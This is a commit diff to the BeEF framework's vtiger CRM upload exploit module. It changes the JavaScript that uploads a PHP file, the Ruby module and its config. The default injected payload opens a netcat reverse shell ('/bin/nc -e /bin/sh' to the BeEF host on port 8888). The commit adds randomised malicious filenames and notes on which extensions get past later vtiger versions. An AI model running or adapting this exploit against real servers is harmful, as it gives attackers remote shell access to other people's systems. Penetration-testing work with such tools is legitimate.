Fixed to work with latest version of beef. Added random file naming and ability to change extension. Also added notes for new version of vTigerCRM.

git-svn-id: https://beef.googlecode.com/svn/trunk@1043 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9

modules/network/vtiger_crm_upload_exploit/command.js

@@ -26,6 +26,22 @@ beef.execute(function() {
 
 	baseurl = "<%= @vtiger_url %>";
 
+	function get_ajax() {
+		var http_request;
+	    // use the ActiveX control for IE5.x and IE6
+	    try {
+	        http_request = new ActiveXObject("MSXML2.XMLHTTP");
+	    } catch (othermicrosoft){
+	        try {
+	            http_request = new ActiveXObject("Microsoft.XMLHTTP");
+	        } catch (native) {
+	            // If IE7, Mozilla, Safari, etc: Use native object
+	            http_request = new XMLHttpRequest();
+	        }
+	    }
+	    return http_request;
+	}
+
 	function do_upload(){ 
 		setTimeout(function() {ajax_upload()}, 1000);
 	}
@@ -40,8 +56,11 @@ beef.execute(function() {
 	function ajax_upload(){ 
 		var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index';
 
-		http_request = false;
-		http_request = beef.net.get_ajax();
+	    var http_request;
+	    
+	    http_request = false;
+	    http_request = get_ajax();
+
 		if (!http_request) {
 			// fail silently!
 			return false;
@@ -77,18 +96,16 @@ beef.execute(function() {
 		+ '\r\n' 
 		+ boundary
 		+ '\r\n'
-		+ 'Content-Disposition: form-data; name="filename"; filename="vtiger-fun.PHP"' + '\r\n' 
+		+ 'Content-Disposition: form-data; name="filename"; filename="<%= @mal_filename %>.<%= @mal_ext %>"' + '\r\n' 
 		+ 'Content-Type: application/x-httpd-php' + '\r\n' 
 		+ '\r\n'
-		+ '<\?php' + '\r\n' 
 		+ '<%= @vtiger_php %>' + '\r\n'
-		+ '\?>' + '\r\n'
 		+ '\r\n'
 		+ boundary
 		+ '\r\n'                                   
 		+ 'Content-Disposition: form-data; name="filename_hidden"' + '\r\n'
 		+ '\r\n' 
-		+ 'vtiger-fun.PHP'
+		+ '<%= @mal_filename %>.<%= @mal_ext %>'
 		+ '\r\n'
 		+ boundary
 		+ '\r\n'
@@ -137,14 +154,14 @@ beef.execute(function() {
 			} else if (uploadstate == 3) {
 				//We got a 200, so hopefully the file was uploaded
 				//be_graceful();
-				do_callfile(0,1000);
+				do_callfile(0, 1000);
 			}
 		},<%= @upload_timeout %>);
 
 		return;
 	}
 
-	function do_callfile(start,count){
+	function do_callfile(start, count){
 		if (document.getElementById('vtigerimg') == null) {
 			return false;
 		}
@@ -152,13 +169,13 @@ beef.execute(function() {
 		for (i=start;i<=start+count;i++)
 		{
 			 var http_request = false;
-			 http_request = beef.net.get_ajax();
+			 http_request = get_ajax();
 			 if (!http_request) {
 				 // fail silently!
 				return false;
 			}
 
-			var findurl = baseurl + "<%= @vtiger_filepath %>" + i + "_vtiger-fun.PHP";
+			var findurl = baseurl + "<%= @vtiger_filepath %>" + i + "_<%= @mal_filename %>.<%= @mal_ext %>";
 			var requestbody = "birds of a feather flock together";
 			
 			http_request.open('POST', findurl, false);

modules/network/vtiger_crm_upload_exploit/config.yaml

@@ -5,6 +5,6 @@ beef:
             category: "Network"
             name: "VTiger CRM Upload Exploit"
             description: "This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM <a href=\"http://www.vtiger.com/\">vtiger 5.0.4</a><br />The default PHP requires a listener, so don't forget to start one, for example: nc -l 8888."
-            authors: ["wade", "bm", "pipes", "xntrik"]
+            authors: ["wade", "bm", "pipes", "xntrik", "yorikv"]
             target:
                 working: ["ALL"]

modules/network/vtiger_crm_upload_exploit/module.rb

@@ -15,14 +15,16 @@ class Vtiger_crm_upload_exploit < BeEF::Core::Command
 
     super({
       'Name' => 'VTiger CRM Upload Exploit',
-      'Description' => 'This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM <a href="http://www.vtiger.com/">vtiger 5.0.4</a><br />The default PHP requires a listener, so don\'t forget to start one, for example: nc -l 8888',
+      'Description' => 'This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM <a href="http://www.vtiger.com/">vtiger 5.0.4</a><br />The default PHP requires a listener, so don\'t forget to start one, for example: nc -l 8888. <br><br>vTigerCRM 5.0.4: Use extension "PHP" and php code.<br>vTigerCRM 5.2.0: Use extension "phtml" and php code.<br>vTigerCRM 5.2.1: Use extensions "shtml" and SSI code.',
       'Category' => 'Network',
-      'Author' => ['wade', 'bm', 'pipes', 'xntrik'],
+      'Author' => ['wade', 'bm', 'pipes', 'xntrik', 'yorikv'],
       'Data' =>
           [
               {'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
               {'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},
-              {'name'=>'vtiger_php','ui_label'=>'Injected PHP','value'=>'passthru("/bin/nc -e /bin/sh '+beef_host+' 8888");','type'=>'textarea','width'=>'400px','height'=>'100px'},
+              {'name'=>'mal_filename','ui_label'=>'Malicious Filename','value'=>rand(32**10).to_s(32),'width'=>'400px'},
+              {'name'=>'mal_ext','ui_label'=>'Malicious File Extension','value'=>'PHP','width'=>'400px'},
+              {'name'=>'vtiger_php','ui_label'=>'Injected PHP (must escape single quotes)','value'=>'<?php passthru("/bin/nc -e /bin/sh '+beef_host+' 8888"); ?>','type'=>'textarea','width'=>'400px','height'=>'100px'},
               {'name'=>'upload_timeout','ui_label'=>'Upload Timeout','value'=>'5000'}
           ],
       'File' => __FILE__